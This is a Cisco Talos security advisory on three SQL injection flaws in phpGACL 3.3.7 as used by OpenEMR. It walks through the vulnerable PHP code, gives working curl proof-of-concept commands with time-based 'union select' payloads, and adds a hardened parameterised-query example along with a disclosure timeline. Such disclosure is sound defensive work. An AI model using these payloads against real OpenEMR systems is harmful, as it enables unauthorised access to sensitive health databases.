CVE-2020-13567: TALOS-2020-1179 || Cisco Talos Intelligence Group
Summary
Multiple SQL injection vulnerabilities exist in phpGACL 3.3.7. A specially crafted HTTP request can lead to a SQL injection. An attacker can send an HTTP request to trigger this vulnerability.
Tested Versions
OpenEMR 5.0.2
OpenEMR development version 6.0.0 (commit babec93f600ff1394f91ccd512bcad85832eb6ce)
phpGACL 3.3.7
Product URLs
http://phpgacl.sourceforge.net/
CVSSv3 Score
8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
Details
phpGACL is a PHP library that allows developers to implement permission systems via a Generic Access Control List.
The latest version of this library is used by OpenEMR, so the tests were performed against an OpenEMR instance.
Across the whole codebase of phpGACL, SQL queries are built using string concatenation, and parameters are often not sanitized.
The following is an (incomplete) list of code paths that lead to SQL injection, caused by missing sanitization of the input parameters that can be injected by an attacker via GET or POST request. Note that similar vulnerable patterns can be seen in edit_objects.php, edit_object_sections.php and others.
CVE-2020-13566 - phpGACL database delete_group SQL injection
In admin/edit_group.php, when the POST parameter action is "Delete", the POST parameter delete_group leads to a SQL injection:
...
switch ($_POST['action']) {
    case 'Delete':
        $gacl_api->debug_text('Delete');
        if (count($_POST['delete_group']) > 0) {
            //Always reparent children when deleting a group.
            foreach ($_POST['delete_group'] as $group_id) {
                $gacl_api->debug_text('Deleting group_id: '. $group_id);
                $result = $gacl_api->del_group($group_id, TRUE, $group_type); [1]
                if ($result == FALSE) {
                    $retry[] = $group_id;
                }
            }
...
The delete_group parameter is sent to the function del_group unsanitized:
function del_group($group_id, $reparent_children=TRUE, $group_type='ARO') {
    switch(strtolower(trim($group_type))) {
        case 'axo':
            $group_type = 'axo';
            $table = $this->_db_table_prefix .'axo_groups';
            $groups_map_table = $this->_db_table_prefix .'axo_groups_map';
            $groups_object_map_table = $this->_db_table_prefix .'groups_axo_map';
            break;
        default:
            $group_type = 'aro';
            $table = $this->_db_table_prefix .'aro_groups';
            $groups_map_table = $this->_db_table_prefix .'aro_groups_map';
            $groups_object_map_table = $this->_db_table_prefix .'groups_aro_map';
            break;
    }
    $this->debug_text("del_group(): ID: $group_id Reparent Children: $reparent_children Group Type: $group_type");
    if (empty($group_id) ) {
        $this->debug_text("del_group(): Group ID ($group_id) is empty, this is required");
        return false;
    }
    // Get details of this group
    $query = 'SELECT id, parent_id, name, lft, rgt FROM '. $table .' WHERE id='. $group_id; [2]
    $group_details = $this->db->GetRow($query);
As we can see, the only sanitized argument is group_type, while group_id (formerly delete_group) is appended to the query unsanitized [2].
Exploit Proof of Concept
This issue has been reproduced by testing against OpenEMR, which ships the latest version of phpGACL. This can be reproduced with the following command:
curl -v -H "Cookie: $cookie" -d "action=Delete&delete_group[0]=1234 union select 1,2,3,4,sleep(3)" "http://openemr.dev/gacl/admin/edit_group.php?site=default"
CVE-2020-13567 - phpGACL database parent_id SQL injection
Again in admin/edit_group.php, when the POST parameter action is "Submit", the POST parameter parent_id leads to a SQL injection:
...
    case 'Submit':
        $gacl_api->debug_text('Submit');
        if (empty($_POST['parent_id'])) {
            $parent_id = 0;
        } else {
            $parent_id = $_POST['parent_id']; [1]
        }
        //Make sure we're not reparenting to ourself.
        if (!empty($_POST['group_id']) AND $parent_id == $_POST['group_id']) {
            echo "Sorry, can't reparent to self!<br />\n";
            exit;
        }
        //No parent, assume a "root" group, generate a new parent id.
        if (empty($_POST['group_id'])) {
            $gacl_api->debug_text('Insert');
            $insert_id = $gacl_api->add_group($_POST['value'], $_POST['name'], $parent_id, $group_type); [2]
        } else {
            $gacl_api->debug_text('Update');
            $gacl_api->edit_group($_POST['group_id'], $_POST['value'], $_POST['name'], $parent_id, $group_type); [3]
        }
...
The parameter parent_id is passed to both add_group [2] and edit_group [3] unsanitized [1].
function add_group($value, $name, $parent_id=0, $group_type='ARO') {
    switch(strtolower(trim($group_type))) {
        case 'axo':
            $group_type = 'axo';
            $table = $this->_db_table_prefix .'axo_groups';
            break;
        default:
            $group_type = 'aro';
            $table = $this->_db_table_prefix .'aro_groups';
            break;
    }
    $this->debug_text("add_group(): Name: $name Value: $value Parent ID: $parent_id Group Type: $group_type");
    $name = trim($name);
    $value = trim($value);
    if ( $name == '' ) {
        $this->debug_text("add_group(): name ($name) OR parent id ($parent_id) is empty, this is required");
        return false;
    }
    //This has to be outside the transaction, because the first time it is run, it will say the sequence
    //doesn't exist. Then try to create it, but the transaction will already by aborted by then.
    $insert_id = $this->db->GenID($this->_db_table_prefix.$group_type.'_groups_id_seq',10);
    if ( $value === '' ) {
        $value = $insert_id;
    }
    $this->db->BeginTrans();
    // special case for root group
    if ($parent_id == 0) {
        ...
    } else {
        if (empty($parent_id)) {
            $this->debug_text("add_group (): parent id ($parent_id) is empty, this is required");
            $this->db->RollbackTrans();
            return FALSE;
        }
        // grab parent details from database
        $query = 'SELECT id, lft, rgt FROM '. $table .' WHERE id='. $parent_id; [4]
        $row = $this->db->GetRow($query);
The function add_group does not sanitize the parent_id at [4], which leads to a SQL injection.
function edit_group($group_id, $value=NULL, $name=NULL, $parent_id=NULL, $group_type='ARO') {
    ...
    $set = array();
    // update name if it is specified.
    if (!empty($name)) {
        $set[] = 'name='. $this->db->quote($name);
    }
    // update parent_id if it is specified.
    if (!empty($parent_id)) {
        $set[] = 'parent_id='. $parent_id; [5]
    }
    // update value if it is specified.
    if (!empty($value)) {
        $set[] = 'value='. $this->db->quote($value);
    }
    if (empty($set)) {
        $this->debug_text('edit_group(): Nothing to update.');
        return FALSE;
    }
    $this->db->BeginTrans();
    $query = 'UPDATE '. $table .' SET '. implode(',', $set) .' WHERE id='. $group_id; [6]
    $rs = $this->db->Execute($query);
    if (!is_object($rs)) {
        $this->debug_db('edit_group');
        $this->db->RollbackTrans();
        return FALSE;
    }
The function edit_group does not sanitize the parent_id at [5], which leads to a SQL injection at [6].
Exploit Proof of Concept
This issue has been reproduced by testing against OpenEMR, which ships the latest version of phpGACL. This can be reproduced with the following command:
curl -v -H "Cookie: $cookie" -d "action=Submit&parent_id=1234 union select 1,2,sleep(3)&name=1" "http://openemr.dev/gacl/admin/edit_group.php?site=default"
CVE-2020-13568 - phpGACL database group_id SQL injection
Again in admin/edit_group.php, when the POST parameter action is "Submit", the POST parameter group_id leads to a SQL injection:
...
    case 'Submit':
        $gacl_api->debug_text('Submit');
        if (empty($_POST['parent_id'])) {
            $parent_id = 0;
        } else {
            $parent_id = $_POST['parent_id']; [1]
        }
        //Make sure we're not reparenting to ourself.
        if (!empty($_POST['group_id']) AND $parent_id == $_POST['group_id']) {
            echo "Sorry, can't reparent to self!<br />\n";
            exit;
        }
        //No parent, assume a "root" group, generate a new parent id.
        if (empty($_POST['group_id'])) {
            $gacl_api->debug_text('Insert');
            $insert_id = $gacl_api->add_group($_POST['value'], $_POST['name'], $parent_id, $group_type); [2]
        } else {
            $gacl_api->debug_text('Update');
            $gacl_api->edit_group($_POST['group_id'], $_POST['value'], $_POST['name'], $parent_id, $group_type); [3]
        }
...
Like before, group_id is passed to edit_group [3] unsanitized:
function edit_group($group_id, $value=NULL, $name=NULL, $parent_id=NULL, $group_type='ARO') {
    $this->debug_text("edit_group(): ID: $group_id Name: $name Value: $value Parent ID: $parent_id Group Type: $group_type");
    switch(strtolower(trim($group_type))) {
        case 'axo':
            $group_type = 'axo';
            $table = $this->_db_table_prefix .'axo_groups';
            break;
        default:
            $group_type = 'aro';
            $table = $this->_db_table_prefix .'aro_groups';
            break;
    }
    if (empty($group_id) ) {
        $this->debug_text('edit_group(): Group ID ('. $group_id .') is empty, this is required');
        return FALSE;
    }
    if ( !is_array($curr = $this->get_group_data($group_id, $group_type)) ) { [4]
        $this->debug_text('edit_group(): Invalid Group ID: '. $group_id);
        return FALSE;
    }
    ...
The function edit_group calls get_group_data at [4], using the unsanitized group_id:
function get_group_data($group_id, $group_type = 'ARO') {
    $this->debug_text("get_group_data(): Group_ID: $group_id Group Type: $group_type");
    switch(strtolower(trim($group_type))) {
        case 'axo':
            $group_type = 'axo';
            $table = $this->_db_table_prefix .'axo_groups';
            break;
        default:
            $group_type = 'aro';
            $table = $this->_db_table_prefix .'aro_groups';
            break;
    }
    if (empty($group_id) ) {
        $this->debug_text("get_group_data(): ID ($group_id) is empty, this is required");
        return false;
    }
    $query = 'SELECT id, parent_id, value, name, lft, rgt FROM '. $table .' WHERE id='. $group_id; [5]
    //$rs = $this->db->Execute($query);
    $row = $this->db->GetRow($query);
    if ($row) {
        return $row;
    }
    $this->debug_text("get_object_data(): Group does not exist.");
    return false;
}
We can see at [5] that group_id is concatenated to the query, leading to a SQL injection.
Exploit Proof of Concept
This issue has been reproduced by testing against OpenEMR, which ships the latest version of phpGACL. This can be reproduced with the following command:
curl -v -H "Cookie: $cookie" -d "action=Submit&parent_id=1234&group_id=1234 union select 1,2,3,4,5,sleep(3)" "http://openemr.dev/gacl/admin/edit_group.php?site=default"
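The three code paths above share one root cause: an integer id taken from the request is concatenated into the SQL string instead of being validated or bound, while the neighbouring name and value fields do go through $this->db->quote(). The following is an added example, not phpGACL's or OpenEMR's code, that puts the vulnerable query-building pattern next to a hardened form. The table name gacl_aro_groups, the rows, the function names group_query_vulnerable, validate_group_id and get_group_data_hardened, and the use of PDO with an in-memory SQLite database in place of phpGACL's ADOdb layer are all assumptions made for the demo.

```php
<?php
// Added example (not phpGACL's or OpenEMR's code): the vulnerable id-concatenation
// pattern from the advisory next to a hardened form. Runs stand-alone with PHP's
// bundled pdo_sqlite; table name and rows below are constructed for the demo.

declare(strict_types=1);

// Vulnerable pattern, as in get_group_data()/del_group(): the id is concatenated
// into the SQL string, so any non-numeric input becomes part of the query.
function group_query_vulnerable(string $table, string $group_id): string
{
    return 'SELECT id, parent_id, value, name, lft, rgt FROM ' . $table . ' WHERE id=' . $group_id;
}

// Hardened input check: group ids come from an integer sequence, so anything
// that is not a plain positive integer is rejected before a query is built.
// Returns null on rejection.
function validate_group_id($group_id): ?int
{
    // FILTER_VALIDATE_INT rejects "1234 union select ...", "12abc", "", "1e3"
    $id = filter_var($group_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Hardened lookup: the validated integer is bound as a parameter, never
// concatenated. In phpGACL's ADOdb-based code the equivalent is an (int) cast
// or $this->db->quote() on the id, plus ADOdb bind parameters for GetRow().
function get_group_data_hardened(PDO $db, string $table, $group_id): ?array
{
    $id = validate_group_id($group_id);
    if ($id === null) {
        return null; // callers treat this like the existing "Invalid Group ID" branch
    }
    // Table names cannot be bound, so they come only from a fixed allow-list,
    // mirroring the switch on $group_type in the original functions.
    $allowed = ['gacl_aro_groups', 'gacl_axo_groups'];
    if (!in_array($table, $allowed, true)) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, parent_id, value, name, lft, rgt FROM ' . $table . ' WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- demo against a constructed in-memory database ---
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE gacl_aro_groups (id INTEGER PRIMARY KEY, parent_id INTEGER, value TEXT, name TEXT, lft INTEGER, rgt INTEGER)');
$db->exec("INSERT INTO gacl_aro_groups VALUES (10, 0, 'root', 'Root', 1, 4), (1234, 10, 'users', 'Users', 2, 3)");

$inputs = [
    '1234',                                  // legitimate id
    '1234 union select 1,2,3,4,5,sleep(3)',  // shape of the advisory's PoC payload
    '1234 or 1=1',
    '',
];

foreach ($inputs as $input) {
    echo 'input: ' . var_export($input, true) . "\n";
    echo '  vulnerable query: ' . group_query_vulnerable('gacl_aro_groups', $input) . "\n";
    $row = get_group_data_hardened($db, 'gacl_aro_groups', $input);
    echo '  hardened result:  ' . ($row === null ? 'rejected / not found' : 'row id=' . $row['id'] . ' name=' . $row['name']) . "\n";
}
```

Run it with `php example.php`. The vulnerable builder only prints the string that would reach the database, which makes the injected tail visible; the hardened lookup rejects every non-integer input before any query exists, and the single remaining concatenation (the table name) is restricted to an allow-list. The same two changes, integer validation of ids and bound parameters, apply to the parent_id path in add_group()/edit_group() as well.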
Timeline
2020-10-23 - Vendor Disclosure
2021-01-05 - Vendor Patched
2021-01-27 - Public Release
Discovered by Claudio Bozzato of Cisco Talos.